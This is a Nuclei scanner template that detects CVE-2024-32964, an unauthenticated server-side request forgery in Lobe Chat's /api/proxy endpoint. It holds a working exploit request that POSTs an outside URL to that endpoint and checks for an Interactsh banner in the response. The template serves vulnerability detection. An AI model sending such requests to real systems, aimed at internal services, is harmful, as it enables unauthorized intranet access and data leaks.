CVE-2024-32964: Lobe Chat <= v0.150.5 - Server-Side Request Forgery

id: CVE-2024-32964

info:
  name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery
  author: s4e-io
  severity: critical
  description: |
    Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32964
    - https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37
    - https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc
    - https://vulert.com/vuln-db/CVE-2024-32964
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H
    cvss-score: 9
    cve-id: CVE-2024-32964
    cwe-id: CWE-918
    epss-score: 0.52422
    epss-percentile: 0.97804
  metadata:
    verified: true
    max-request: 2
    vendor: lobehub
    product: lobe-chat
    fofa-query: icon_hash="1975020705"
  tags: cve,cve2024,lobechat,ssrf,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /welcome HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "lobechat")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        POST /api/proxy HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain

        http://oast.me

    matchers:
      - type: word
        part: response
        words:
          - "<h1> Interactsh Server </h1>"
# digest: 4b0a00483046022100c2bf397b08dec532ea31146800af1d20b808c8e6b0914469f968e6b731c3b663022100cfab6b9d998bc2aa1b4f2e83702a172c829b83ce41340fc04e80b07b569c86f4:922c64590222798bb761d5b6d8e72950